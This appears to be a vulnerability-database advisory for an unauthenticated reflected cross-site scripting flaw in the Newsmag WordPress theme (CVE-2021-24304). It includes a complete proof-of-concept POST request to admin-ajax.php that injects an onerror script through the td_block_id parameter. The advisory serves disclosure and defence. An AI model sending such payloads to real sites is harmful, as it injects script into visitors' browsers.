Lucene search
Truoc PhanWPEX-ID:BB71F2F9-76BD-43F4-A8C9-35771DD28DFFHistoryJul 12, 2021 - 12:00 a.m.
Newsmag < 5.0 - Unauthenticated Reflected Cross-site Scripting (XSS)
2021-07-1200:00:00
Truoc Phan
96
The theme does not sanitise the td_block_id parameter in its td_ajax_block AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability. Due to a nonce check, this issue is only exploitable on unauthenticated users (for as long as the nonce used in the request is valid)
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Connection: close
action=td_ajax_block&td_block_id="><img+src+onerror=alert(document.domain)>&block_type=td_block_related_posts&td_magic_token=59c7ec0654Related
prion
prion
Cross site scripting
2021-08-09 10:15:00
wpvulndb
wpvulndb
Newsmag < 5.0 - Unauthenticated Reflected Cross-site Scripting (XSS)
2021-07-12 00:00:00
cve
cve
CVE-2021-24304
2021-08-09 10:15:00
Related for WPEX-ID:BB71F2F9-76BD-43F4-A8C9-35771DD28DFF